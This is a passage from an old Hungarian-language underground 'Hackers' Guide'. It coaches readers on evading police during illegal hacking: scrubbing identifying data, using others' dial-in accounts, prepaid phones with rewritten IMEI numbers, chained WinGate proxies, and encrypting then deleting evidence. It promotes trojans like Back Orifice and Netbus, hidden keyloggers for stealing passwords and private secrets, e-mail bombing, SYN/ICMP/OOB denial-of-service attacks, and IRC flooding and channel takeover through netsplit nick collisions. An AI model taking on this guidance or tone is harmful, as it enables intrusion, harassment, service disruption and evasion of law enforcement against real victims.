lehetnek: Saját suli: ehhez nem kell varázsolgatni, csak töltsd fel, nem fog a sulid a szolgáltatóhoz menni, hogy elkérje a usernevet, meg a telefonszámot. De utána kussolj, nem kell reklámozni, hogy te voltál Vállalati, céges lapok: Én vigyáznék a helyedben... Közismert, nagy látogatottságú lapok: 100% PARANOIÁVAL, lásd később... .MIL, .GOV, és társaik: Felejtsd el, ne legyél hülye. Ne kezdjél el baszakodni velük. Ha nagyon akarod, akkor 100% PARANOIÁVAL (lejjebb írok róla...), bármit is
74
Hackers’ Guide
csinálsz. 100% PARANOIA Nézzük csak, milyen nyomok vannak, ami alapján téged, mint személyt beazonosíthatnak! Egyrészt, kezdjük ott, hogy ha valami vindózos fosod van, mint nekem, akkor felkapcsolódásnál kb. 4-5 adatot közöl a dialup a szerverrel..... múltkor egy számítógépet közbeiktattam fizikailag a modem és a gépem közé. Loggoltam MINDENT ami a modem és a szerver között ment. Valami ilyesmi jött ki: AT ATE0V1 ATX4 ATDT0651201201 ~blablablablablg mindenféle szarság usernév/jelszó, blablablablablablablabla mindenféle szarság blablablablaMAD MIND, blabla, DIGITAL NEXUS, blabla, MAD MIND blablabla, MACRI, bla blablablablablablablablablablabla MAD, blablablablablablablablabla Ugye milyen kellemes? Tudtál erről? És tudsz még a 20 másik dologról, ami alapján a GÉPED beazonosíthatják? Mert hiába csinálsz mindent más vonalról, más usernévvel, ha ezt a fajta infót is loggolják, akkor tudják, hogy ugyanaz a gép, amivel valaha már felmentél a netre, mondjuk a saját loginoddal, a saját telefonszámodon, vagy írtál egy emailt, amiből kiderült, hogy ki voltál. Visszakereshető, rizikós. Épp ezért kell átnézni a REGISTRY-t (windowsban...), hogy milyen infó van, amit nem szeretnél, hogy lássanak, mint az én példámban, ahol 2-szer benne volt, hogy "MAD MIND", a nickem, egyszer, hogy "MAD" mint vezetéknév, "MACRI", mint a windows usernevem (ezt mi a FASZNAK kell tudniuk?!), és a "Digital Nexus", mint vállalatnév, ez esetben egy régi hacker csapat, aminek tagja voltam. Ugye kellemetlen? Erre megoldás, hogy dialin accot szerzel egy iskolában (lehetőleg nem a sajátodban), és ott talán nem loggolnak ennyi infót. Következő állomás (természetesen most a lehető legparanoidabb, de azért még reális védekezésről beszélek egy nagyobb méretű akció előtt, nem azt mondom, hogy mindig így kell :))): Veszel egy pannon praktikumot, vagy egy westel dominót. Még jobb, ha ericssonod van, azzal állítólag könnyű átírni a kártya IMEI számát, így azonosítatlanul telefonálhatsz, és még ingyen is. Ha megvan, egyszerűen felcsatlakozol a megtervezett módon a netre, és nekilátsz. így már fasz se fog kinyomozni, remélhetőleg. Persze nem kell azt se hinni, hogy ott a rendőrségnél meg általában mindenhatóak a "szakemberek". Ha eléggé óvatos vagy, nem fognak megtalálni. HÉTKÖZNAPI PARANOIA Amikor épp csak beszélgetünk, tervezünk valamit, akkor sem árt vigyáznunk a levelezéssel. Tudod te, hány szerveren keresztül megy egy email amit elküldesz? Tudod hány helyen tudják azt leszedni? A válasz három betű: SOK. Túl sok ahhoz, hogy te bármiféle illegalitást emailben megbeszélhess nyugodtan. Van mindenféle titkosítóprogram, de akkor már rég rossz, ha titkosított file-okat küldözgetsz a címzettnek. E-Mailezésre ajánlok egy programot, amit a skót haverommal használtunk jó hosszú ideig. Láttad a "The Saint" c. filmet? A magyar címe meglepő módon "Az angyal" volt. Onnan merítettem az ötletet. Jön egy email, amiben a feladó az időről kérdez, leír egy karfiolos besameles receptet, és üdvözli a testvéreidet.
75
Hackers’ Guide
Ekkor te ráuszítod a programot, ami kiszed belőle néhány betűt, összerakja őket, és ott is van a szöveg: "HOLNAP 6-KOR FELBASSZUK A MATÁVNETET". Egész jó ötlet, nem? És az a vicces benne, hogy senki se tudhatja, hogy a levélben már szinte SZÓ SZERINT a sorok között van a tartalom. A program neve "HÁLÓ", mivel úgy működik, mint egy háló. Akivel levelezni akarsz ilyen módon, annak floppyn odaadod a "HÁLÓ"-mintát, amin a lyukak helyei vannak, és már mehet is a levelezés. Bővebb információt a programot kitömörítve találhatsz. Itt a link: HALO.ZIP. Eléggé kicsi a progam ahhoz képest, hogy mennyire hasznos, igaz, DOS-ra írtam, de attól még tökéletesen lehet használni. ADATTÁROLÁS Naja... adattárolás. Ha olyasmit csinálsz (márpedig ha ezt olvasod, akkor foglalkozol vele), ami nem totálisan legális, egyáltalán ne lepődj meg, ha egy nap jön pár civilruhás ember, néhány egyenruhás kíséretében, és "lefoglalnak", "elkoboznak", "kutatnak". Mindegyik lényege ugyanaz.... Felkapják a gépet, és viszik. Épp ezért, bármi olyat tárolsz a gépeden, ami neked fontos, de "lefoglalási" szempontból kellemetlen lenne, azt titkosítsd, ideiglenesen. Erre a feladatra van már egymillió program, de az az igazság, hogy sohasem tudhatod, hogy melyik az, amelyik tényleg eléggé erős védelemmel van ellátva. Én megoldottam ezt a problémát: írtam egy saját titkosító programot. Olyan matematikai algoritmusokat tettem bele, amelyeknek a tulajdonságaival én sem vagyok teljesen tisztában. Háromféle, dokumentálatlan titkosítási módszert használok benne. Szép felülete van, és ez az egyetlen program, amiről biztos vagyok, hogy 100%-os védettségben tartja azt, amit titkosítok vele. Nem nagy file-okra terveztem, mert eléggé lassú archiválásra, de egy-két tömörített file-t lazán lehet vele titkosítani, és ha biztosan tudják, hogy egy négybetűs jelszavat választottál magadnak, akkor is kb. 100 év, amíg megfejtik. Szóval ez az amit én védelemnek nevezek. És annyira rohadtul biztos, hogy még a forrását is kiadom. Szép pascal program. Tehát, itt lehet leszedni: SICRIT.ZIP, program, forrás, és dokumentáció egyben. Tehát ha már megvan, hogy mivel titkosítasz ideiglenesen fileokat, akkor mondok egy tuti tippet a biztonságra: rendszeresen MENTSÉL, és TÖRÖLJ! Ugye, nem is bonyolult? Nem árt, ha van CD íród, sőt, nagyon jó. Ha mindened megvan CD-n, akkor lefekvés előtt már törölhetsz is esténként. Most hülyének nézel biztos, de ha lesz belőled valami, azonkívül, hogy lószar, tetű, vagy lábtörlő, akkor potenciális esélyed van arra, hogy egyszercsak kijöjjenek hozzád. Gondolj csak bele a példák alapján: gondolta volna a gyerek aki kapott a haverjától matávnetes accot, hogy kijönnek hozzá? Gondolta volna a lamer, aki back orifice-el etetett be embereket, és úgy szerzett hozzáféréseket? Sőt, a legjobb - gondolta volna a srác aki átírta a 2000-et a bizonylaton 1990-re paintbrushban, és CSAK FELRAKOTT EGY JPG-t A NETRE ami egy hamisított, poénból beszkennelt otp bizonylat volt, hogy kijönnek, és elkobozzák a gépét? Vagy az élet & irodalom szerkesztője, aki - igaz, nem hekkeléssel, de mégis - publikált titkos, vagy talán nem is létező adatokat, hogy felforgatják a lakását? Egyre gyakrabbak ezek az esetek, és sohasem tudni, ki lesz a következő nevetséges áldozat. Én talán már be vagyok biztosítva. És te?
************************************************************************************************
76
Hackers’ Guide
Hack Windows alól és tudnivalók Elorebocsatjuk, hogy ezen anyag teljes mertekben a mi muvunk, nem forditas (egyes reszek kivetelevel, ahol ezt jelezzuk), es nem masolas. Egyetlen resze sem atvett anyag. Szabadon terjesztheto, formazhato DE: tartalmi valtoztatas nelkul, a nevunk lathato kiirasaval. (Lehetoleg nem fekete alapon feketevel, es nem ket pontos betumerettel :) Bocs hogy egyszer egyes szamban maskor tobbesben beszelunk magunkrol, de az anyag munkamegosztasban keszult. A szakerto es sok eve a szakmaban tevekenykedo hackerek valoszinuleg nem sokra mennek ezzel az anyaggal, nem elsosorban nekik, hanem azoknak az embereknek keszult, akik felhasznaloi szinten mar regota hasznaljak a szamitogepet, de meg akarnak ismerkedni a fekete oldallal is; valamint azoknak, akik rejtelyes okokbol folyton elszallnak az IRC-n torteno beszelgetes kozben.(Vagy mindig kinyilik a CDajto ;) Oke pupakok! Nezzuk milyen eszkozok allnak rendelkezesre a Windowshoz, melyekkel egy kis nem kivant mukodest lehet eloidezni a halozatban. Ezt az oprendszert meg mindig sokkal tobben hasznaljak, mint barmely mas operacios rendszert, ezert megeri kivul-belul jol megismerni, barmennyire is nem tetszik. Az igazi hacker mindenre kivancsi. I. Altalanos eszkozok II. D.o.S. III. IRC tudomany IV. Vegszo
I. Általános eszközök Ide tartoznak: telnet, trojai programok, portscannerek, keyloggerek, firewall, email bombazok. Nezzuk mire jok ezek: 1. Telnet A telnet arra hasznalhato, hogy egy masik gephez csatlakozva szoveges kommunikaciot folytassunk vele. Ehhez Start>Run>telnet <masik gep neve vagy IPje> <port> parancsot kell kiadnunk. Pl. ha a mail.matav.hu szamitogephez akarsz csatlakozni, a 25-os porton, akkor ird be: telnet mail.matav.hu 25. Ha nem adsz meg portot, akkor alapertelmezettnek a 23-as portot veszi, amit ugy is neveznek, hogy telnet-port. Ha egy kicsit is tudsz angolul, nem okozhat gondot a telnet hasznalata. Egyik fontos beallitasa a local echo, amellyel azt adhatjuk meg, hogy az ablakba altalunk begepelt karaktereket megjelenitse-e a program. Ez azert lehet hasznos, mert van olyan szerver, amelyik a neki kuldott karaktereket visszakuldi, igy ketszer jelenik meg az ablakban es ez zavaro. Ha viszont kikapcsoljuk es a szerver nem kuldi vissza (ez az echo) akkor nem latjuk, mit irunk.
77
Hackers’ Guide
Egyebkent ha egy karaktert leutunk, azt a program azonnal el is kuldi. Ez majd kesobb fontos lehet. 2. Portscannerek A portscanner arra jo, hogy egy masik szamitogep nyitott portjait megallapithassuk. Osszesen 65536 kulonbozo (TCP) portja lehet egy szamitogepnek, de ezek kozul csak nehany van nyitva. Nehany a nevezetes portok kozul: 25-mail port, ha nyitva van, akkor valoszinuleg mail-szerver uzemel a gepen; 80-www/http port, webszerver; 21-ftp port; 23-telnet; 7-echo; 13-daytime; 139-netbios; stb. A nyitott portokon keresztul tudunk csak a gephez kapcsolodni. Sokfele kulonbozo portscannert lattam mar. A szolgaltatasok koze tartoznak: megadott IP-tartomany keresese, megadott port-tartomany keresese, loggolas, a megnyithato portokra beallithato uzenet kuldese, uzenet fogadasa, a szerver altal lecsukott portok "nyitvatartasi idejenek" merese, a portok megnyitasa kozotti ido beallithatosaga, stb. 3. Trojai programok A ket legismertebb a BO (vagy Back Orifice, magyarul hatso nyilas) es a Netbus. Masok is leirtak mar, mik is ezek, de nem hagyhatom ki oket a felsorolasbol. A trojai programok olyan programok, melyek ket reszbol allnak: a szerver- es a kliensprogrambol. Ha a szerverprogramot felinstallalod az egyik gepre, akkor a klienssel vezerelni tudod azt, es kulonbozo dolgokat tudsz vegrehajtani. Eleg oreg dolgok mar ezek (tobb mint egy evesek), es habar a hacker-filozofiaval nem ellenkezik a hasznalatuk, egyesek berzenkednek tole, tul egyszeru oket hasznalni. Hasznalatuk azert kulonbozo problemakat felvet. Pl. a celgepre valahogy fel kell installalni a szervert, s ha nincs fizikai hozzaferesed, eleg nehez ugy. Pl. az IRC-n raveheted, hogy vegye at toled es inditsa el. (Ezt nem taglalom, szerintem nagyon gyerekes dolog. Akit ra tudsz venni, az annyira buta, hogy inkabb meg kellene vedeni, nem szivatni.) Nezzuk mit tudnak ezek. BO - a Cult of the Dead Cow (CdC) termeke. Csak Win9x-en mukodik. Legismertebb valtozata az 1.20. Kodolt UDP csomagokkal kommunikal, ami osszekottetes-mentes kommunikaciot jelent. Lehetove teszi a kliensnek a celgep regisztracios adatbazisanak modositasat, amivel eleg sok mindent vegre tud hajtani. Ki tudja fejteni a gepen tarolt jelszavakat, pl. a kepernyokimeloet vagy az Internet-eleres jelszavat. Keplopasra is kepes, bar nem annyira ugyesen, mint a Netbus. Billentyuzet-figyelest is vegre tud hajtani, valamint kilistazza a futo alkalmazasokat, merevlemez tartalmat, fileok torlese, mozgatasa, megtekintese, beepitett webszerver, alkalmazasok leallitasa, inditasa, TCP-n keresztul file-ok fogadasa, kuldese, sysinfo lekerdezes, gep lefagyasztasa, ujrabootolas az alapszolgaltatasok. Ezeken kivul kulonfele pluginek leteznek hozza, amelyekkel meg erdekesebb dolgokat lehet csinalni: hozzakapcsolni a szervert egy masik exe-filehoz, mint egy virust; egy masik plugin e-mailt kuld a megadott cimre, ha a szamitogep fellep az Internetre, leirja a gep IP-cimet, stb. Netbus - tud egypar dolgot, amit a BO, nem mindet, de vannak dolgok, amit a BO nem tud. Termeszetesen mindketto ugy reklamozza magat, mint "remoteadministering tool", azaz tav-adminisztracios eszkoz, de a BO inkabb a hackerek kezebe valo, mig a Netbus szorakozasra. Ilyen pl. a CD-ajto nyitogatasa, az eger vezerlese, egergombok felcserelese, gombok letiltasa... de azert jol hasznalhato
78
Hackers’ Guide
egyeb piszkos dolgokra is. Sok valtozata terjedt el, 1.53, 1.6, es a leggyakoribb az 1.7. Nemreg jott ki a 2.0, de az mar nem rejti el magat, mert kihagytak belole egy par lehetoseget, hogy ne lehessen vele visszaelni. Persze ehhez is jelent mar meg crack ... :) Egyebkent TCP-kapcsolatot hoz letre, es WinNT alatt is fut. Kulonben a legtobb viruskereso felismeri mar oket. Kulon felismero programokat is konnyen lehet talalni a neten, amelyek eltavolitjak oket. De kezileg is felismerhetok: inditsd el: Start>Run>regedit, majd HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Currentversion>Run, vagy RunServices. Itt nezd vegig a programokat, ezeket inditja el a Windows indulaskor. Ha talalsz valami gyanusat, szedd ki es kesz. (Jobb gomb>Delete.) Kulonben se tul jo ha ismeretlen dolgok tanyaznak itt. Persze itt csak ovatosan turkalj, ha valami gyanusat talalsz, elobb nezd meg a haverodnal, neki megvan-e! 4. Keylogger A keylogger magyarul billentyuzetfigyelo. Jegyzi a leutott billentyuket es eltarolja oket egy fileba. A Netbusban olyan beepitett billentyuzetfigyelo van, amelyik egybol at is kuldi a kliensnek a leutott billentyuket. A jobbak azonban eltaroljak az Alt, Ctrl, Shift, Backspace, Del, F1-F12, Esc stb. karaktereket is, kesobb sokkal jobban fel lehet hasznalni a logfilet. Lattam olyat is, amelyik a programok inditasat es a kilepeseket is figyelte es rogzitette. Ezek mar tulmennek az egyszeru billentyuzetfigyeles hataran. Nos, a billentyuzetfigyelok hasznalata akkor erdekes, ha fizikai hozzaferesed van (lehetoleg rendszeresen) a celgephez, es masokkal kozosen hasznalod. Jelszavakat, maganeleti titkokat lophatsz vele. Erdemes olyat valasztani, amelyik kussban fut (nem eszlelheto), mar sok ilyen van. 5. Firewall Magyarul tuzfal. Egy olyan program, amellyel a halozati forgalmat tudod figyelni es kontrollalni. Jo vedelmet jelent, ha egy tuzfal moge bujsz, mert nem tudjak letapogatni a nyitott portjaidat, ha nem akarod; vagy nem tudnak hozzaferni az esetlegesen a gepeden futo BO-hoz vagy Netbushoz vagy egyeb trojai programhoz. Ezek a programok akkor erdekesek, ha pl. modemmel csatlakozol az Internethez, tehat kozotted es az Internet kozott nincs masik szamitogep. (Pl. nem egy alhalozaton vagy. Az alhalozatok eseteben csak az egyik gep van az Internetre kotve, a tobbi ehhez csatlakozik, igy ennek kell a tuzfal szerepet ellatni, hogy az egesz halozatot megvedje.) 6. WinGate szerverek A WinGate szerverek relative ismeretlenek a magyar mezei hackereknek. Vagy ugyesen titkoljak, mindenesetre nem nagyon reklamozzak. A WinGate szerver olyan szerver, melynek segitsegevel IP cimunket elrejthetjuk, lenyomozhatatlanna tehetjuk. Ugy kell elkepzelni, hogy ha egy masik szamitogephez akarsz csatlakozni, akkor kozbeiktatsz egy masik szamitogepet (WinGate szerver) amelynek mindossze kozvetito szerepe van, de firewallkent is mukodik. (Igen, igen! Aki ezek utan nem jon ra magatol, mire jo a WinGate, az most azonnal hagyja abba az olvasast, az soha nem lesz hacker!) Szoval egy igazi nagy durranas. Nezzuk, hogyan kell hasznalni: Tegyuk fel, hogy a WinGate szerver neve ttt.wingate.com, portja 23 (ez altalanos). A fenti peldanal maradva, a mail.matav.hu 25-os portjara akarunk csatlakozni. Vegyuk
79
Hackers’ Guide
elo ismet a telnetet: telnet ttt.wingate.com A kovetkezo sztringet kapjuk: WinGate> A WinGate szerverek egyebkent visszaechoznak, tehat a local echot ki kell kapcsolni. Irjuk be: mail.matav.hu:25 Es WHALAA! csatlakoztunk a mail.matav.hu 25-os portjara, de meg ha loggoljak is az IP-t, akkor is azt latjak majd, hogy ttt.wingate.com. Na persze, vannak egyes WinGate szerverek, amelyek szinten rogzitik a csatlakozok IP cimeit, de amig kapcsolatba lepnek veluk, visszanyomoznak teged, addig eltelik egy par nap/het, valamint: "fuzz ossze tobb WinGate szervert egymas utan" es mar nem is eri meg a faradsagot visszanyomozni teged. Pfff! Egyebkent WinGate szerver listaert nezz korul a neten, mert allandoan valtozik. (Marmint a lista.) 7. E-mail bombazok Ezekkel a programokkal inkabb bosszanto mint veszedelmes eredmenyt tudsz elerni, azonban a torvenyek ezt is tiltjak. Arra szolgalnak, hogy nevtelenul rengeteg mocskolodo levellel elaraszd a celpont levelesladajat, igy teletoltve egyreszt nem tud ujat fogadni, masreszt eltart egy darabig, mig letolti oket, majd letorli oket. Hatrany, hogy nem tudod az arcat figyelni, amikor megpillantja, mennyi levele jott. Mindenesetre elegtetelt vehetsz. Probald ki az Avalanche es Kaboom legujabb verzioit. Az Avalanche, nekem ugy tunt tobbet tud: gyorsabbnak mondja magat, valamint van benne egy sereg opcio.: WinGate hasznalat, hibauzenettel torteno bombazas, beepitett sertegeto (persze angol), es egy sereg tipp, amelyek jol jonnek ha letoltod.
II. D.o.S. A D.o.S. nem a BillGatez-fele fenomenalis oprendszer, hanem a Denial of Service angol szavak roviditese. A DoS olyan tevekenyseg, melynek soran/eredmenyekepp egy bizonyos szolgaltatas szinvonala csokken vagy a szolgaltatas megszunik. Megvilagitom. Tegyuk fel, hogy van egy webszerver (valahol a vilagban, mindegy.) Ezen egy DoS tamadast vegrehajtva jo esetben a szolgaltatas lelassul, nehezen elerhetove valnak az oldalak, vagy egyaltalan nem valaszol majd a szerver, esetleg lefagy, vagy ujraindul. Most haromfele DoS tamadast fogok ismertetni: a SYN floodot, az ICMP floodot es az OOB Nuke-t. SYN flood (forditva/feldolgozva a "SYN Floods and SYN Cookies - The cause and cure" cimu NeonSurge/Rhino9 irasbol): ez a fajta tamadas a TCP-kapcsolat felepitesenek serulekenysegen alapul. Mielott belemegyunk, elotte elmagyarazom, hogyan is mukodik a TCP. 1. A kliens (aki kapcsolatot akar teremteni a masik geppel) kerelmet kuld a celgepnek, megadva a portot, amelyhez csatlakozni akar. 2. A szerver visszakuldi a kerelem nyugtazasat, valamint lefoglalja a memoriajaban a kapcsolathoz szukseges adatteruletet.
80
Hackers’ Guide
3. A kliens nyugtazza a szerver valaszat es ezzel a kapcsolat letrejott, lehet TCPcsomagokat kuldozgetni mindket iranyban. Kicsit bovebben: 1. A kliens egy SYN (synchronize) kerelmet kuld a szervernek, egy ISNnel (initial sequence number) egyutt. Az ISNbol rakja sorrendbe az operacios rendszer az erkezo TCP-csomagokat (a csomagok ugyanis nem biztos, hogy sorrendben erkeznek, el is veszhetnek utkozben, megduplazodhatnak). Az ISN az alcazott tamadasok eseteben is fontos szerepet jatszik. 2. A szerver megkapja a SYN-t, es valaszol egy SYN-nel, egy ISN-nel es egy nyugtazassal (ACK). 3. A kliens nyugtazza (ACK) a szerver valaszt. A SYN flood lenyege, hogy a kliens az elso lepest vegrehajtja, de a harmadikat mar nem. Ezaltal a szerver soha nem kap nyugtazast a valaszara, tehat varakozni kezd. Egy bizonyos ido utan torli a kapcsolatot es felszabaditja a memoriat. Azonban, ha rovid ido alatt eleg sok kerelem erkezik, a port hasznalhatatlanna valik Optimalis esetben le is fagyhat. Abban az esetben, ha a szerver is egy egyszeru szamitogep, mondjuk egy mezei IRC-felhasznalo, a SYN-floodnak nem sok jelentosege van. De pl. ha ftp- vagy webszerver fut rajta, meg lehet akadalyozni, hogy mas felhasznalok is tudjanak kapcsolodni hozza. A port mindaddig hasznalhatatlan marad, amig SYN-kerelmek erkeznek. Meg nem volt alkalmam kiprobalni, de egyszer majd erdemes lenne, hogy vegre lehet-e hajtani egy ilyen tamadast valamelyik IRC-szerver 6667-es portjan (persze gondolom eleg sokan kell csinalni, hogy megalljon a rendszer :). A tamadast lehet konnyeden alcazni is, azaz a szervernek ugy tuntetni fel a dolgot, mintha a csomagok mindig mas-mas IP cimrol erkeznenek. Igy nem nagyon lehet megallapitani, hogy ki volt a tettes. Mellesleg jegyzem meg, hogy ezzel az alcazott tamadassal tonkre lehet tenni egy tuzfalat is, ha a szerver memoriaja nem tul nagy... ICMP flood (nemely reszei a Chaos Inc. wnuke4.doc-bol valok): az IP-hez (Internet Protocol) kozeli szinten mukodik. Az ICMP az Internet Control Message Protocol angol szavak roviditese. Ez egy adminisztracios protokoll, amely szetkapcsolodott szamitogepeknek (is) szolgaltat jelenteseket. Az ICMP flood (vagy ICMP nuke) programok hamis jelentest keszitenek, es a naiv TCP/IP implementaciok azt hiszik, hogy a kapcsolatuk a celgeppel megszakadt. Ezeknek az ICMP csomagoknak kulonbozo fajtajuk van, mindegyik mas-mas szetkapcsolodast jelent. Ilyenek pl. a Protocol Unreachable, Port Unreachable, Network Unreachable, Host Unreachable, Source Route Failed stb. Az ICMP ECHO flood specialis abbol a szempontbol, hogy nem okoz szetkapcsolast, hanem valaszt var a celgeptol. Ha nagyon sok ilyen csomag erkezik, az lelassitja az Internet-kapcsolatot, mert egyreszt fogadja a valaszt, masreszt erre valaszol is. Ehhez hasonlit meg az UDP flood is, amely azonban a gyakorlatban mar nem hasznalhato. Ilyen programokat barki kereshet a neten. Nemcsak Windows szerverekre mukodnek, es hasznosnak bizonyulhatnak az IRC-haboruban. Egyebkent... ki tudja? A rombolast szolgalja mind.
81
Hackers’ Guide
OOB Nuke: a Windows-gepekre hatnak, es altalaban a 139-es, NETBIOS porton operalnak. Specialis csomagokat kuldenek erre a cimre, es ha a tamadas sikeres, elougrik a Halal Kek Kepernyoje :) ilyenkor az aldozatnak ujra kell inditania a szamitogepet, ha tovabb akar Internetezni. Nagyon elterjedtek, mert a Win95 és egyes Win95 OSR2 valtozatok nem voltak kepesek kivedeni. Amennyire en tudom, a Win98 mar nem reagal rajuk.
III. IRC tudomány Az IRC eloremozditoja a magyar hackerek fejlodesenek. Szerintem az IRC azert jo terulet, mert: a) egybol latod munkad vegeredmenyet b) sokan tudnak teamben dolgozni c) csak az szamit, kinek van tobb esze, nem pedig a nyers testi ero. Mostanra, ha atolvastad az elso ket fejezetet, tisztaban vagy egy-ket dologgal. Ennek a fejezetnek az a celja, mikeppen vedd magad a virtualis kuzdoteren. Mert hogy vedeni kell magad, az nem is vitas. Termeszetesen a leghatekonyabb vedekezes a tamadas, ezert ezt sem hagyhatod ki a repertoarodbol. Azonban figyelmezteteskeppen: lehet, hogy az elejen, uj tudasod birtokaban feleslegesen is hasznalni fogod ezeket az eszkozoket, ami meg megbocsathato, foleg ha figyelembe vesszuk, hogy neha egy toled erosebb ellenfellel akadsz ossze aki majd helyretesz (pl. egy IRC operatorral). Ha nem IRCeltel meg, akkor ezt a fejezetet nyugodtan atugorhatod, mert nem fogod erteni a gyakorlati jelentoseget. Es meg egy jotanacs: tanulmanyozd at az RFC1459-et, amely minden IRC-hacker elso lepese kellene, hogy legyen (ebbol lehet leginkabb megerteni sok egyebbel egyutt, hogy miert is jott letre az IRC). 1. Az IRC halozat szerkezete, netsplit, nick collision, K-Line 2. Flood 3. Wingate> 1. Az IRC halozat szerkezete, netsplit, nick collision, K-Line Az IRC szerverek fa-strukturaban csatlakoznak egymashoz. Ez azt jelenti, hogy zart lanc sehol nem johet letre. Ha megis letrejonne valahol, akkor ott azonnal szet is kapcsol ket szerver. (Ez reszletesen le van irva az RFC1459-ben.) Minden kliens csatlakozik egy szerverhez, es ha uzenetet kuldenek, az vegigvandorol az egesz fan a szervereken, amig mindenki meg nem kapja, akinek az uzenet szolt. Minden szerver egyidoben ugyanazt kell, hogy lassa egy IRC-halozaton. Ha valtozas tortenik, az a szervereken vegighullamozva mindenutt ervenyesitesre jut (pl. ha egy kliens bejelentkezik valahova, azt az osszes szervernek tudnia kell); ezert nem lehet zart lanc sehol, hiszen akkor egy szerver ketszer is megkapna egy-egy uzenetet. Ha tul nagy az adatforgalom ket szerver kozott, akkor a szerverek elvalnak (ez tortenhet mas okbol is, de ez a legegyszerubb). Ez a netsplit. Ilyenkor az IRC halozat ketteosztodik, ket fastrukturaju halozat jon letre. Ilyenkor az osszes csatorna is kettevalik: azok a kliensek, akik a fa elso reszenek valamelyik szervererol jottek be, csak azokkal a kliensekkel fognak tudni kommunikalni, amelyek szinten azon a reszen jottek be, mig a masik fa kliensei csak a sajat halozatuk klienseivel. Ilyenkor minden csatornan az oppal rendelkezok kozul is csak azok fognak megmaradni, akik a sajat halozaton vannak. Jelenleg a netsplit utan a szerverek 20 percig taroljak a nick adatokat, azaz 20 percig nem lehet olyan nickre valtani, amelyik a netsplit elott hasznalatban volt es a masik oldalon maradt. De 20 perc utan mar valaszthatsz
82
Hackers’ Guide
olyan nicket is, amelyik a masik oldalon ragadt, es ennek jelentosege akkor jelentkezik, mikor a szerverek ujbol osszekapcsolodnak. Ilyenkor a szerverek kicserelik az informacioikat es egyesitik az azonos nevu csatornakat: aki barmelyik oldalon op volt, az ezutan is op lesz, aki nem, az nem. Ha a ket oldalon azonos nevu klienseket talalnak, akkor mind a ketto kapcsolatat megszuntetik a szerverek. (Ez a nick collision.) Kezded kapisgalni? Tetelezzuk fel a kovetkezo viszonylag egyszeru esetet: egy csatornan ket op van, mondjuk mindketto bot. Legyen az egyik @Peti, a masik @Pali. Tetelezzuk fel, hogy mindketto az irc.elte.hu -rol jott be. Rajtuk kivul meg Gergely van a csatin, es el akarja foglalni, mert o a hacker. O az irc.webbernet.net rol van. Keletkezik egy netsplit, Gergelynek opja lesz a masik oldalon, mivel ott egyedul van. Meg ket klienset behoz a masik oldalon, arra a halozatra, amelyiken o is van, Peti es Pali neven. Persze ehhez 20 percet kell varnia, es szerencse kell ahhoz, hogy ezalatt ne egyesuljon a ket oldal. Miutan mindez megvan, nem kell mast tennie, mint varni az egyesulesre es ahh! Az osszes Peti es Pali kihal, csak o marad a csatornan, mint op. A netsplitek es netjoinok figyelesere lepj be a &servers csatornara, vagy pl. a Dalneten a +s flaget allitsd be. (Az IRCNeten nem ismerik a flaget.) A K-Line (szerverban) pedig azt jelenti, hogy egy adott szerverrol nem engednek be bizonyos IP-cimekrol klienseket. Ezt IRC operatorok tudjak elrendelni (akik, mint tudjuk, nem ugyanazok, mint a csatornaoperatorok). A szerver nem rendeltetesszeru hasznalata eseten kaphatunk ilyet, pl. klonok bevitele, folyamatos veg nelkuli floodolas, csatornak hivatasszeru elfoglalasa, fake username hasznalata, botok futtatasa, ha tilos stb. Ilyenkor az IRCop donti el, hogy pl a *.dial.matav.hu-et bannolja, vagy a *.matav.hu-t, vagy esetleg a *.hu-t :) 2. Flood Nos, ez egyertelmuen tamadofegyver, barmilyen tipusrol is legyen szo. Egy par lehetoseget mar megvizsgaltunk a II.fejezetben. Az IRC-n leggyakoribb az ICMP flood, a programokban a szerver helyere azt az IRC szervert ird be, amelyikrol az ellenfeled bejott, a kliens helyere az o IP-cimet, szerverportok: altalaban 6667-6669, de ez szerverenkent eltero lehet. A kliensportok pedig altalaban: 1024-1400. A leghatekonyabb Unreach tipusnak a Protocol Unreachable bizonyult. Most nezzuk milyen mas eszkozok vannak meg masokat floodolni: Nickflood: gyorsan valtoztatod a nickedet. Ez ellen nem lehet vedekezni, csak ha kirugnak a csatornarol. Altalaban is ervenyes, hogy ezeket az eszkozoket csak ott tudod hatekonyan felhasznalni, ahol nem all fenn ennek a veszelye. A nickflood ellen nem lehet ignore-val vedekezni, mert a nickvaltasrol szolo uzeneteket mindenkeppen megkapja minden kliens a szervertol, amelyik a csatornan van. Topicflood: gyorsan valtoztatod a topicot. Szinten nem lehet vedekezni ellene. Csak akkor mukodik, ha jogod van a topicot valtoztatni. Join/Part: gyorsan kilepsz-belepsz a csatornarol/ra. Ezeket az uzeneteket is megkapja mindenki a csatornan. Ezeken a modokon minden csatornan levo szemelyt floodolsz. CTCP flood: nehany IRC kliens implementalja (alkalmazza) a CTCP-t (Client To Client Protocol). Hasznalata: /ctcp
. A tipus lehet: CLIENTINFO, VERSION, TIME, DCC, USERINFO, FINGER, PING. Hatasara a tipustol fuggoen
83
Hackers’ Guide
mindig egy bizonyos informaciot kapunk a klienstol, pl. milyen verzioju kliensprogramot hasznal, mennyi nala az ido, valamint a PING- re megkapjuk a kliens es a kozottunk levo idot, amelyet az uzeneteknek meg kell tenniuk. Ha valakit CTCP flooddal tamadsz meg, a kliense ugyanolyan gyorsan uzeneteket kuld neked vissza, de ha szerencsed van, az IRC szerver kiteszi a szuret. Persze a kliensben ki is lehet kapcsolni a CTCP-t. Msgflood: privat uzenetek gyors kuldese. Akkor a leghatekonyabb, ha az illetonek olyan szkriptje van, amely automatikusan valaszol az uzenetekre. Vagy esetleg bot ellen, ha rosszul van konfiguralva, es nem korlatozza a sajat uzeneteinek gyorsasagat. Channelflood: ez a leggagyibb. Egyszeruen rengeteg szemettel arasztod el a csatornat, igy elvezhetetlen lesz a beszelgetes, optimalis esetben a lassubb kapcsolattal rendelkezok kiesnek. No persze: A leghatekonyabb, ha tobben csinaljatok a floodolast, minel tobben, annal jobb. Irhatsz szkriptet is ra, de jobb megoldasnak tunik, ha programot hasznalsz ra, amelyik sok klonnal tud egyszerre floodolni. Igy ha ki is esik egyik-masik klon, ujra tud csatlakozni. Megjegyzes: Nuke/ICMP flooder programot nem adok el, nem cserelek es nem vasarolok. Ajandekba se adok. 3. WinGate> Mar tudjuk, mi az a WinGate, nezzuk, hogyan lehet IRC-zesre hasznalni. Legyen a WinGate a ttt.wingate.com, 23-as port, az irc szerver pedig mondjuk az irc.wingated.com, 6667-es port. Inditsuk el az IRC klienst, es 